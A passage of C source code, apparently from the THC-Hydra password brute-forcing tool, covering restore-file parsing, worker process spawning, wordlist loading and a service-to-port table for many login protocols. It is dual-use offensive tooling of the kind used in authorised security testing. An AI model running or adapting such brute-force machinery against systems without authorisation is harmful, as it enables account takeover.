\", RESTOREFILE);\n perror(\"\");\n exit(-1);\n }\n\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (strcmp(out, PROGRAM) != 0) {\n fprintf(stderr, \"[ERROR] invalid restore file (begin)\\n\");\n exit(-1);\n }\n\n if ((fck = (int32_t)fread(buf, 1, 4, f)) != 4) {\n fprintf(stderr, \"[ERROR] invalid restore file (platform)\\n\");\n exit(-1);\n }\n if (buf[0] == 0 || buf[1] == 0) {\n fprintf(stderr, \"[ERROR] restore file is prior hydra version v8.5!\\n\");\n exit(-1);\n }\n if (buf[0] != VERSION[1] || buf[1] != VERSION[3])\n fprintf(stderr,\n \"[WARNING] restore file was created by version %c.%c, this is \"\n \"version %s\\n\",\n buf[0], buf[1], VERSION);\n if (buf[2] != sizeof(int32_t) % 256 || buf[3] != sizeof(hydra_head *) % 256) {\n fprintf(stderr, \"[ERROR] restore file was created on a different, \"\n \"incompatible processor platform!\\n\");\n exit(-1);\n }\n\n fck = (int32_t)fread(&bf_options, sizeof(bf_options), 1, f);\n fck = (int32_t)fread(mynull, sizeof(mynull), 1, f);\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 1 complete\\n\");\n if (mynull[0] + mynull[1] + mynull[2] + mynull[3] == 0) {\n bf_options.crs = NULL;\n } else {\n bf_options.crs = malloc(BF_CHARSMAX);\n memcpy(bf_options.crs, mynull, sizeof(mynull));\n fck = fread(bf_options.crs + sizeof(mynull), BF_CHARSMAX - sizeof(mynull), 1, f);\n }\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 2 complete\\n\");\n\n fck = (int32_t)fread(&hydra_brains, sizeof(hydra_brain), 1, f);\n hydra_brains.ofp = stdout;\n fck = (int32_t)fread(&hydra_options, sizeof(hydra_option), 1, f);\n hydra_options.restore = 1;\n verbose = hydra_options.verbose;\n debug = hydra_options.debug;\n if (debug || orig_debug)\n printf(\"[DEBUG] run_debug %d, orig_debug %d\\n\", debug, orig_debug);\n if (orig_debug) {\n debug = 1;\n hydra_options.debug = 1;\n }\n waittime = hydra_options.waittime;\n conwait = hydra_options.conwait;\n port = hydra_options.port;\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_options.server = strdup(out);\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 3 complete\\n\");\n if (strlen(out) > 0) {\n hydra_options.outfile_ptr = malloc(strlen(out) + 1);\n strcpy(hydra_options.outfile_ptr, out);\n } else\n hydra_options.outfile_ptr = NULL;\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 4 complete\\n\");\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 5 complete\\n\");\n if (strlen(out) == 0)\n hydra_options.miscptr = NULL;\n else {\n hydra_options.miscptr = malloc(strlen(out) + 1);\n strcpy(hydra_options.miscptr, out);\n }\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 6 complete\\n\");\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 7 complete\\n\");\n hydra_options.service = malloc(strlen(out) + 1);\n strcpy(hydra_options.service, out);\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 8 complete\\n\");\n\n login_ptr = malloc(hydra_brains.sizelogin + hydra_brains.countlogin + 8);\n if (!login_ptr) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", hydra_brains.sizelogin + hydra_brains.countlogin + 8);\n exit(-1);\n }\n fck = (int32_t)fread(login_ptr, hydra_brains.sizelogin + hydra_brains.countlogin + 8, 1, f);\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 9 complete\\n\");\n if (!check_flag(hydra_options.mode, MODE_COLON_FILE)) { // NOT colonfile mode\n pass_ptr = malloc(hydra_brains.sizepass + hydra_brains.countpass + 8);\n if (!pass_ptr) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", hydra_brains.sizepass + hydra_brains.countpass + 8);\n exit(-1);\n }\n fck = (int32_t)fread(pass_ptr, hydra_brains.sizepass + hydra_brains.countpass + 8, 1, f);\n } else { // colonfile mode\n hydra_options.colonfile = empty_login; // dummy\n pass_ptr = csv_ptr = login_ptr;\n }\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 10 complete\\n\");\n\n hydra_targets = (hydra_target **)malloc((hydra_brains.targets + 3) * sizeof(hydra_target *));\n if (!hydra_targets) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", (hydra_brains.targets + 3) * sizeof(hydra_target *));\n exit(-1);\n }\n for (j = 0; j < hydra_brains.targets; j++) {\n hydra_targets[j] = malloc(sizeof(hydra_target));\n if (!hydra_targets[j]) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", sizeof(hydra_target));\n exit(-1);\n }\n fck = (int32_t)fread(hydra_targets[j], sizeof(hydra_target), 1, f);\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_targets[j]->target = malloc(strlen(out) + 1);\n strcpy(hydra_targets[j]->target, out);\n sck = fgets(out, sizeof(out), f);\n hydra_targets[j]->login_ptr = login_ptr + atoi(out);\n sck = fgets(out, sizeof(out), f);\n hydra_targets[j]->pass_ptr = pass_ptr + atoi(out);\n sck = fgets(out, sizeof(out), f); // target login_ptr, ignord\n sck = fgets(out, sizeof(out), f);\n if (hydra_options.bfg) {\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_targets[j]->pass_ptr = malloc(strlen(out) + 1);\n strcpy(hydra_targets[j]->pass_ptr, out);\n }\n if (hydra_targets[j]->redo > 0) {\n if (debug)\n printf(\"[DEBUG] target %d redo %d\\n\", j, hydra_targets[j]->redo);\n for (i = 0; i < hydra_targets[j]->redo; i++) {\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_targets[j]->redo_login[i] = malloc(strlen(out) + 1);\n strcpy(hydra_targets[j]->redo_login[i], out);\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_targets[j]->redo_pass[i] = malloc(strlen(out) + 1);\n strcpy(hydra_targets[j]->redo_pass[i], out);\n }\n }\n if (hydra_targets[j]->skipcnt >= hydra_brains.countlogin)\n hydra_targets[j]->skipcnt = 0;\n if (hydra_targets[j]->skipcnt > 0)\n for (i = 0; i < hydra_targets[j]->skipcnt; i++) {\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_targets[j]->skiplogin[i] = malloc(strlen(out) + 1);\n strcpy(hydra_targets[j]->skiplogin[i], out);\n }\n hydra_targets[j]->fail_count = 0;\n hydra_targets[j]->use_count = 0;\n hydra_targets[j]->failed = 0;\n }\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 11 complete\\n\");\n hydra_heads = malloc(sizeof(hydra_head *) * hydra_options.max_use);\n if (!hydra_heads) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", sizeof(hydra_head *) * hydra_options.max_use);\n exit(-1);\n }\n for (j = 0; j < hydra_options.max_use; j++) {\n hydra_heads[j] = malloc(sizeof(hydra_head));\n if (!hydra_heads[j]) {\n fprintf(stderr, \"Error: malloc(%lu) failed\\n\", sizeof(hydra_head));\n exit(-1);\n }\n fck = (int32_t)fread(hydra_heads[j], sizeof(hydra_head), 1, f);\n hydra_heads[j]->sp[0] = -1;\n hydra_heads[j]->sp[1] = -1;\n sck = fgets(out, sizeof(out), f);\n if (hydra_heads[j]->redo) {\n if (debug)\n printf(\"[DEBUG] head %d redo\\n\", j);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n hydra_heads[j]->current_login_ptr = malloc(strlen(out) + 1);\n strcpy(hydra_heads[j]->current_login_ptr, out);\n }\n sck = fgets(out, sizeof(out), f);\n if (hydra_heads[j]->redo) {\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (debug)\n printf(\"[DEBUG] TEMP head %d: pass == %s, login == %s\\n\", j, out, hydra_heads[j]->current_login_ptr);\n if (out[0] != 0 || hydra_heads[j]->current_login_ptr[0] != 0) {\n hydra_heads[j]->current_pass_ptr = malloc(strlen(out) + 1);\n strcpy(hydra_heads[j]->current_pass_ptr, out);\n if (debug)\n printf(\"[DEBUG] redo: %d %s/%s\\n\", j, hydra_heads[j]->current_login_ptr, hydra_heads[j]->current_pass_ptr);\n } else {\n hydra_heads[j]->redo = 0;\n free(hydra_heads[j]->current_login_ptr);\n hydra_heads[j]->current_login_ptr = hydra_heads[j]->current_pass_ptr = empty_login;\n }\n } else {\n hydra_heads[j]->current_login_ptr = hydra_heads[j]->current_pass_ptr = empty_login;\n }\n }\n if (debug)\n printf(\"[DEBUG] reading restore file: Step 12 complete\\n\");\n sck = fgets(out, sizeof(out), f);\n if (out[0] != 0 && out[strlen(out) - 1] == '\\n')\n out[strlen(out) - 1] = 0;\n if (strcmp(out, PROGRAM) != 0) {\n fprintf(stderr, \"[ERROR] invalid restore file (end)\\n\");\n exit(-1);\n }\n fclose(f);\n hydra_debug(0, \"hydra_restore_read\");\n}\n\nvoid killed_childs(int32_t signo) {\n int32_t pid, i;\n\n killed++;\n pid = waitpid(-1, NULL, WNOHANG);\n for (i = 0; i < hydra_options.max_use; i++) {\n if (pid == hydra_heads[i]->pid) {\n hydra_heads[i]->pid = -1;\n hydra_kill_head(i, 1, 0);\n return;\n }\n }\n}\n\nvoid killed_childs_report(int32_t signo) {\n // if (debug)\n printf(\"[ERROR] children crashed! (%d)\\n\", child_head_no);\n fck = write(child_socket, \"E\", 1);\n _exit(-1);\n}\n\nvoid kill_children(int32_t signo) {\n int32_t i;\n\n if (verbose)\n fprintf(stderr, \"[ERROR] Received signal %d, going down ...\\n\", signo);\n if (process_restore == 1)\n hydra_restore_write(1);\n if (hydra_heads != NULL) {\n for (i = 0; i < hydra_options.max_use; i++)\n if (hydra_heads[i] != NULL && hydra_heads[i]->pid > 0)\n kill(hydra_heads[i]->pid, SIGTERM);\n for (i = 0; i < hydra_options.max_use; i++)\n if (hydra_heads[i] != NULL && hydra_heads[i]->pid > 0)\n kill(hydra_heads[i]->pid, SIGKILL);\n }\n exit(0);\n}\n\nuint64_t countlines(FILE *fd, int32_t colonmode) {\n size_t clines = 0;\n char *buf = malloc(MAXLINESIZE);\n int32_t only_one_empty_line = 0;\n\n#ifdef HAVE_ZLIB\n gzFile fp = gzdopen(fileno(fd), \"r\");\n#else\n FILE *fp = fd;\n#endif\n\n size_of_data = 0;\n\n#ifdef HAVE_ZLIB\n while (!gzeof(fp)) {\n if (gzgets(fp, buf, MAXLINESIZE) != NULL) {\n#else\n while (!feof(fp)) {\n if (fgets(buf, MAXLINESIZE, fp) != NULL) {\n#endif\n size_of_data += strlen(buf);\n if (buf[0] != 0) {\n if (buf[0] == '\\r' || buf[0] == '\\n') {\n if (only_one_empty_line == 0) {\n only_one_empty_line = 1;\n clines++;\n }\n } else {\n clines++;\n }\n }\n }\n }\n#ifdef HAVE_ZLIB\n gzrewind(fp);\n#else\n rewind(fp);\n#endif\n free(buf);\n return clines;\n}\n\nvoid fill_mem(char *ptr, FILE *fd, int32_t colonmode) {\n char tmp[MAXBUF + 4] = \"\", *ptr2;\n uint32_t len;\n int32_t only_one_empty_line = 0;\n\n int read_flag = 0;\n#ifdef HAVE_ZLIB\n gzFile fp = gzdopen(fileno(fd), \"r\");\n\n while (!gzeof(fp) && !read_flag) {\n if (gzgets(fp, tmp, MAXLINESIZE) != NULL) {\n#else\n FILE *fp = fd;\n\n while (!feof(fp) && !read_flag) {\n if (fgets(tmp, MAXLINESIZE, fp) != NULL) {\n#endif\n if (tmp[0] != 0) {\n if (tmp[strlen(tmp) - 1] == '\\n')\n tmp[strlen(tmp) - 1] = '\\0';\n if (tmp[0] != 0 && tmp[strlen(tmp) - 1] == '\\r')\n tmp[strlen(tmp) - 1] = '\\0';\n if ((len = strlen(tmp)) > 0 || (only_one_empty_line == 0 && colonmode == 0)) {\n if (len == 0 && colonmode == 0) {\n only_one_empty_line = 1;\n len = 1;\n tmp[len] = 0;\n }\n if (colonmode) {\n if ((ptr2 = strchr(tmp, ':')) == NULL) {\n fprintf(stderr,\n \"[ERROR] invalid line in colon file (-C), missing colon \"\n \"in line: %s\\n\",\n tmp);\n exit(-1);\n } else {\n *ptr2 = 0;\n }\n }\n memcpy(ptr, tmp, len);\n ptr += len;\n *ptr = '\\0';\n ptr++;\n }\n }\n } else {\n read_flag = 1;\n }\n }\n#ifdef HAVE_ZLIB\n if (fp != Z_NULL) gzclose(fp);\n#else\n if (fp) fclose(fp);\n#endif\n}\n\nchar *hydra_build_time() {\n static char datetime[24];\n struct tm *the_time;\n time_t epoch;\n\n time(&epoch);\n the_time = localtime(&epoch);\n strftime(datetime, sizeof(datetime), \"%Y-%m-%d %H:%M:%S\", the_time);\n return (char *)&datetime;\n}\n\nvoid hydra_service_init(int32_t target_no) {\n int32_t x = 99;\n int32_t i;\n hydra_target *t = hydra_targets[target_no];\n FILE *ofp = hydra_brains.ofp;\n\n for (i = 0; x == 99 && i < sizeof(services) / sizeof(services[0]); i++) {\n if (strcmp(hydra_options.service, services[i].name) == 0) {\n if (services[i].init) {\n x = services[i].init(t->ip, -1, options, t->miscptr, ofp, t->port, t->target);\n break;\n }\n }\n }\n\n // dirty workaround here:\n#ifdef LIBSSH\n if (strcmp(hydra_options.service, \"ssh\") == 0)\n x = service_ssh_init(t->ip, -1, options, login_ptr, ofp, t->port, t->target);\n#endif\n\n if (x != 0 && x != 99) {\n if (x > 0 && x < 4)\n hydra_targets[target_no]->done = x;\n else\n hydra_targets[target_no]->done = TARGET_ERROR;\n hydra_brains.finished++;\n if (hydra_brains.targets == 1) {\n if (hydra_brains.ofp != NULL && hydra_brains.ofp != stdout) {\n if (hydra_options.outfile_format == FORMAT_JSONV1) {\n char json_error[120];\n snprintf(json_error, sizeof(json_error), \"[ERROR] unexpected result connecting to target %s port %d\", hydra_address2string_beautiful(t->ip), t->port);\n fprintf(hydra_brains.ofp,\n \"\\n\\t],\\n\\\"success\\\": false,\\n\\\"errormessages\\\": [ \\\"%s\\\" \"\n \"],\\n\\\"quantityfound\\\": %\" hPRIu64 \" }\\n\",\n json_error, hydra_brains.found);\n }\n fclose(hydra_brains.ofp);\n }\n exit(-1);\n }\n }\n}\n\nint32_t hydra_spawn_head(int32_t head_no, int32_t target_no) {\n int32_t i;\n\n if (head_no < 0 || head_no >= hydra_options.max_use || target_no < 0 || target_no >= hydra_brains.targets) {\n if (verbose > 1 || debug)\n printf(\"[DEBUG-ERROR] spawn_head: head_no %d, target_no %d\\n\", head_no, target_no);\n return -1;\n }\n\n if (hydra_heads[head_no]->active == HEAD_DISABLED) {\n printf(\"[DEBUG-ERROR] child %d should not be respawned!\\n\", head_no);\n return -1;\n }\n\n if (socketpair(PF_UNIX, SOCK_STREAM, 0, hydra_heads[head_no]->sp) == 0) {\n child_head_no = head_no;\n if ((hydra_heads[head_no]->pid = fork()) == 0) { // THIS IS THE CHILD\n // set new signals for child\n process_restore = 0;\n child_socket = hydra_heads[head_no]->sp[1];\n signal(SIGCHLD, killed_childs);\n signal(SIGTERM, exit);\n#ifdef SIGBUS\n signal(SIGBUS, exit);\n#endif\n signal(SIGSEGV, killed_childs_report);\n signal(SIGHUP, exit);\n signal(SIGINT, exit);\n signal(SIGPIPE, exit);\n // free structures to make memory available\n cmdlinetarget = hydra_targets[target_no]->target;\n for (i = 0; i < hydra_options.max_use; i++)\n if (i != head_no)\n free(hydra_heads[i]);\n for (i = 0; i < hydra_brains.targets; i++)\n if (i != target_no)\n free(hydra_targets[i]);\n if (hydra_options.loginfile != NULL)\n free(login_ptr);\n if (hydra_options.passfile != NULL)\n free(pass_ptr);\n if (hydra_options.colonfile != NULL && hydra_options.colonfile != empty_login)\n free(csv_ptr);\n // we must keep servers_ptr for cmdlinetarget to work\n if (debug)\n printf(\"[DEBUG] head_no %d has pid %d\\n\", head_no, getpid());\n\n hydra_target *t = hydra_targets[target_no];\n int32_t sp = hydra_heads[head_no]->sp[1];\n // char *miscptr = hydra_options.miscptr;\n FILE *ofp = hydra_brains.ofp;\n hydra_target *head_target = hydra_targets[hydra_heads[head_no]->target_no];\n for (i = 0; i < sizeof(services) / sizeof(services[0]); i++) {\n if (strcmp(hydra_options.service, services[i].name) == 0) {\n if (services[i].exec) {\n services[i].exec(t->ip, sp, options, t->miscptr, ofp, t->port, head_target->target);\n // just in case a module returns (which it shouldnt) we let it exit\n // here\n exit(-1);\n }\n }\n }\n\n // FIXME: dirty workaround here\n if (strcmp(hydra_options.service, \"xmpp\") == 0) {\n service_xmpp(hydra_targets[target_no]->target, hydra_targets[target_no]->ip, hydra_heads[head_no]->sp[1], options, hydra_options.miscptr, hydra_brains.ofp, hydra_targets[target_no]->port, hydra_targets[hydra_heads[head_no]->target_no]->target);\n }\n\n // just in case a module returns (which it shouldnt) we let it exit here\n exit(-1);\n } else {\n child_head_no = -1;\n if (hydra_heads[head_no]->pid > 0) {\n fck = write(hydra_heads[head_no]->sp[1], \"n\",\n 1); // yes, a small \"n\" - this way we can distinguish later\n // if the client successfully tested a pair and is\n // requesting a new one or the mother did that\n (void)fcntl(hydra_heads[head_no]->sp[0], F_SETFL, O_NONBLOCK);\n if (hydra_heads[head_no]->redo != 1)\n hydra_heads[head_no]->target_no = target_no;\n hydra_heads[head_no]->active = HEAD_ACTIVE;\n hydra_targets[hydra_heads[head_no]->target_no]->use_count++;\n hydra_brains.active++;\n hydra_heads[head_no]->last_seen = time(NULL);\n if (debug)\n printf(\"[DEBUG] child %d spawned for target %d with pid %d\\n\", head_no, hydra_heads[head_no]->target_no, hydra_heads[head_no]->pid);\n } else {\n perror(\"[ERROR] Fork for children failed\");\n hydra_heads[head_no]->sp[0] = -1;\n hydra_heads[head_no]->active = HEAD_UNUSED;\n return -1;\n }\n }\n } else {\n perror(\"[ERROR] socketpair creation failed\");\n hydra_heads[head_no]->sp[0] = -1;\n hydra_heads[head_no]->active = HEAD_UNUSED;\n return -1;\n }\n return 0;\n}\n\nint32_t hydra_lookup_port(char *service) {\n int32_t i = 0, port = -2;\n\n hydra_portlist hydra_portlists[] = {{\"ftp\", PORT_FTP, PORT_FTP_SSL},\n {\"ftps\", PORT_FTP, PORT_FTP_SSL},\n {\"http-head\", PORT_HTTP, PORT_HTTP_SSL},\n {\"http-post\", PORT_HTTP, PORT_HTTP_SSL},\n {\"http-get\", PORT_HTTP, PORT_HTTP_SSL},\n {\"http-get-form\", PORT_HTTP, PORT_HTTP_SSL},\n {\"http-post-form\", PORT_HTTP, PORT_HTTP_SSL},\n {\"https-get-form\", PORT_HTTP, PORT_HTTP_SSL},\n {\"https-post-form\", PORT_HTTP, PORT_HTTP_SSL},\n {\"https-head\", PORT_HTTP, PORT_HTTP_SSL},\n {\"https-get\", PORT_HTTP, PORT_HTTP_SSL},\n {\"http-proxy\", PORT_HTTP_PROXY, PORT_HTTP_PROXY_SSL},\n {\"http-proxy-urlenum\", PORT_HTTP_PROXY, PORT_HTTP_PROXY_SSL},\n {\"icq\", PORT_ICQ, PORT_ICQ_SSL},\n {\"imap\", PORT_IMAP, PORT_IMAP_SSL},\n {\"ldap2\", PORT_LDAP, PORT_LDAP_SSL},\n {\"ldap3\", PORT_LDAP, PORT_LDAP_SSL},\n {\"ldap3-crammd5\", PORT_LDAP, PORT_LDAP_SSL},\n {\"ldap3-digestmd5\", PORT_LDAP, PORT_LDAP_SSL},\n {\"oracle-listener\", PORT_ORACLE, PORT_ORACLE_SSL},\n {\"oracle-sid\", PORT_ORACLE, PORT_ORACLE_SSL},\n {\"oracle\", PORT_ORACLE, PORT_ORACLE_SSL},\n {\"memcached\", PORT_MCACHED, PORT_MCACHED_SSL},\n {\"mongodb\", PORT_MONGODB, PORT_MONGODB},\n {\"mssql\", PORT_MSSQL, PORT_MSSQL_SSL},\n {\"cobaltstrike\", PORT_COBALTSTRIKE, PORT_COBALTSTRIKE_SSL},\n {\"mysql\", PORT_MYSQL, PORT_MYSQL_SSL},\n {\"postgres\", PORT_POSTGRES, PORT_POSTGRES_SSL},\n {\"pcanywhere\", PORT_PCANYWHERE, PORT_PCANYWHERE_SSL},\n {\"nntp\", PORT_NNTP, PORT_NNTP_SSL},\n {\"pcnfs\", PORT_PCNFS, PORT_PCNFS_SSL},\n {\"pop3\", PORT_POP3, PORT_POP3_SSL},\n {\"redis\", PORT_REDIS, PORT_REDIS_SSL},\n {\"rexec\", PORT_REXEC, PORT_REXEC_SSL},\n {\"rlogin\", PORT_RLOGIN, PORT_RLOGIN_SSL},\n {\"rsh\", PORT_RSH, PORT_RSH_SSL},\n {\"sapr3\", PORT_SAPR3, PORT_SAPR3_SSL},\n {\"smb\", PORT_SMBNT, PORT_SMBNT_SSL},\n {\"smb2\", PORT_SMBNT, PORT_SMBNT_SSL},\n {\"smbnt\", PORT_SMBNT, PORT_SMBNT_SSL},\n {\"socks5\", PORT_SOCKS5, PORT_SOCKS5_SSL},\n {\"ssh\", PORT_SSH, PORT_SSH_SSL},\n {\"sshkey\", PORT_SSH, PORT_SSH_SSL},\n {\"telnet\", PORT_TELNET, PORT_TELNET_SSL},\n {\"adam6500\", PORT_ADAM6500, PORT_ADAM6500_SSL},\n {\"cisco\", PORT_TELNET, PORT_TELNET_SSL},\n {\"cisco-enable\", PORT_TELNET, PORT_TELNET_SSL},\n {\"vnc\", PORT_VNC, PORT_VNC_SSL},\n {\"snmp\", PORT_SNMP, PORT_SNMP_SSL},\n {\"cvs\", PORT_CVS, PORT_CVS_SSL},\n {\"svn\", PORT_SVN, PORT_SVN_SSL},\n {\"firebird\", PORT_FIREBIRD, PORT_FIREBIRD_SSL},\n {\"afp\", PORT_AFP, PORT_AFP_SSL},\n {\"ncp\", PORT_NCP, PORT_NCP_SSL},\n {\"smtp\", PORT_SMTP, PORT_SMTP_SSL},\n {\"smtp-enum\", PORT_SMTP, PORT_SMTP_SSL},\n {\"teamspeak\", PORT_TEAMSPEAK, PORT_TEAMSPEAK_SSL},\n {\"sip\", PORT_SIP, PORT_SIP_SSL},\n {\"vmauthd\", PORT_VMAUTHD, PORT_VMAUTHD_SSL},\n {\"xmpp\", PORT_XMPP, PORT_XMPP_SSL},\n {\"irc\", PORT_IRC, PORT_IRC_SSL},\n {\"rdp\", PORT_RDP, PORT_RDP_SSL},\n {\"asterisk\", PORT_ASTERISK, PORT_ASTERISK_SSL},\n {\"s7-300\", PORT_S7_300, PORT_S7_300_SSL},\n {\"rtsp\", PORT_RTSP, PORT_RTSP_SSL},\n {\"rpcap\", PORT_RPCAP, PORT_RPCAP_SSL},\n {\"radmin2\", PORT_RADMIN2, PORT_RADMIN2},\n // ADD NEW SERVICES HERE - add new port numbers to hydra.h\n {\"\", PORT_NOPORT, PORT_NOPORT}};\n\n while (strlen(hydra_portlists[i].name) > 0 && port == -2) {\n if (strcmp(service, hydra_portlists[i].name) == 0) {\n if (hydra_options.ssl)\n port = hydra_portlists[i].port_ssl;\n else\n port = hydra_portlists[i].port;\n }\n i++;\n }\n if (port < 1)\n return -1;\n else\n return port;\n}\n\n// killit = 1 : kill(pid); fail = 1 : redo, fail = 2/3 : disable\nvoid hydra_kill_head(int32_t head_no, int32_t killit, int32_t fail) {\n if (debug)\n printf(\"[DEBUG] head_no %d, kill %d, fail %d\\n\", head_no, killit, fail);\n if (head_no < 0)\n return;\n if (hydra_heads[head_no]->active == HEAD_ACTIVE || (hydra_heads[head_no]->sp[0] > 2 && hydra_heads[head_no]->sp[1] > 2)) {\n close(hydra_heads[head_no]->sp[0]);\n close(hydra_heads[head_no]->sp[1]);\n }\n if (killit) {\n if (hydra_heads[head_no]->pid > 0)\n kill(hydra_heads[head_no]->pid, SIGTERM);\n hydra_brains.active--;\n }\n if (hydra_heads[head_no]->active == HEAD_ACTIVE) {\n hydra_heads[head_no]->active = HEAD_UNUSED;\n hydra_targets[hydra_heads[head_no]->target_no]->use_count--;\n }\n if (fail == 1) {\n if (hydra_options.cidr != 1)\n hydra_heads[head_no]->redo = 1;\n } else if (fail == 2) {\n if (hydra_options.cidr != 1)\n hydra_heads[head_no]->active = HEAD_DISABLED;\n if (hydra_heads[head_no]->target_no >= 0)\n hydra_targets[hydra_heads[head_no]->target_no]->failed++;\n } else if (fail == 3) {\n hydra_heads[head_no]->active = HEAD_DISABLED;\n if (hydra_heads[head_no]->target_no >= 0)\n hydra_targets[hydra_heads[head_no]->target_no]->failed++;\n }\n if (hydra_heads[head_no]->pid > 0 && killit)\n kill(hydra_heads[head_no]->pid, SIGKILL);\n hydra_heads[head_no]->pid = -1;\n if (fail < 1 && hydra_heads[head_no]->target_no >= 0 && hydra_options.bfg && hydra_targets[hydra_heads[head_no]->target_no]->pass_state == 3 && strlen(hydra_heads[head_no]->current_pass_ptr) > 0 && hydra_heads[head_no]->current_pass_ptr != hydra_heads[head_no]->current_login_ptr) {\n free(hydra_heads[head_no]->current_pass_ptr);\n hydra_heads[head_no]->current_pass_ptr = empty_login;\n // hydra_bfg_remove(head_no);\n // hydra_targets[hydra_heads[head_no]->target_no]->bfg_ptr[head_no] =\n // NULL;\n }\n (void)waitpid(-1, NULL, WNOHANG);\n}\n\nvoid hydra_increase_fail_count(int32_t target_no, int32_t head_no) {\n int32_t i, k, maxfail = 0;\n\n if (target_no < 0 || hydra_options.skip_redo)\n return;\n\n if (hydra_targets[target_no]->ok) {\n const int32_t tasks = hydra_options.tasks;\n const int32_t success = tasks - hydra_targets[target_no]->failed;\n const int32_t t = tasks < 5 ? 6 - tasks : 1;\n const int32_t s = success < 5 ? 6 - success : 1;\n maxfail = MAXFAIL + t + s + 2;\n }\n\n hydra_targets[target_no]->fail_count++;\n if (debug)\n printf(\"[DEBUG] hydra_increase_fail_count: %d >= %d => disable\\n\", hydra_targets[target_no]->fail_count, maxfail);\n if (hydra_targets[target_no]->fail_count >= maxfail) {\n k = 0;\n for (i = 0; i < hydra_options.max_use; i++)\n if (hydra_heads[i]->active >= HEAD_UNUSED && hydra_heads[i]->target_no == target_no)\n k++;\n if (k <= 1) {\n // we need to put this in a list, otherwise we fail one login+pw test\n if (hydra_targets[target_no]->done == TARGET_ACTIVE && hydra_options.skip_redo == 0 && hydra_targets[target_no]->redo <= hydra_options.max_use * 2 && ((hydra_heads[head_no]->current_login_ptr != empty_login && hydra_heads[head_no]->current_pass_ptr != empty_login) || (hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL))) {\n hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_login_ptr;\n hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_pass_ptr;\n hydra_targets[target_no]->redo++;\n total_redo_count++;\n if (debug)\n printf(\"[DEBUG] - will be retried at the end: ip %s - login %s - \"\n \"pass %s - child %d\\n\",\n hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no);\n hydra_heads[head_no]->current_login_ptr = empty_login;\n hydra_heads[head_no]->current_pass_ptr = empty_login;\n }\n if (hydra_targets[target_no]->fail_count >= MAXFAIL + hydra_options.tasks * hydra_targets[target_no]->ok) {\n if (hydra_targets[target_no]->done == TARGET_ACTIVE && hydra_options.max_use <= hydra_targets[target_no]->failed) {\n if (hydra_targets[target_no]->ok == 1)\n hydra_targets[target_no]->done = TARGET_ERROR; // mark target as done by errors\n else\n hydra_targets[target_no]->done = TARGET_UNRESOLVED; // mark target as done by unable to connect\n hydra_brains.finished++;\n fprintf(stderr,\n \"[ERROR] Too many connect errors to target, disabling \"\n \"%s://%s%s%s:%d\\n\",\n hydra_options.service, hydra_targets[target_no]->ip[0] == 16 && strchr(hydra_targets[target_no]->target, ':') != NULL ? \"[\" : \"\", hydra_targets[target_no]->target, hydra_targets[target_no]->ip[0] == 16 && strchr(hydra_targets[target_no]->target, ':') != NULL ? \"]\" : \"\", hydra_targets[target_no]->port);\n } else {\n hydra_targets[target_no]->failed++;\n }\n if (hydra_brains.targets <= hydra_brains.finished)\n hydra_kill_head(head_no, 1, 0);\n else\n hydra_kill_head(head_no, 1, 2);\n }\n // we keep the last one alive as long as it make sense\n } else {\n // we need to put this in a list, otherwise we fail one login+pw test\n if (hydra_targets[target_no]->done == TARGET_ACTIVE && hydra_options.skip_redo == 0 && hydra_targets[target_no]->redo <= hydra_options.max_use * 2 && ((hydra_heads[head_no]->current_login_ptr != empty_login && hydra_heads[head_no]->current_pass_ptr != empty_login) || (hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL))) {\n hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_login_ptr;\n hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo] = hydra_heads[head_no]->current_pass_ptr;\n hydra_targets[target_no]->redo++;\n total_redo_count++;\n if (debug)\n printf(\"[DEBUG] - 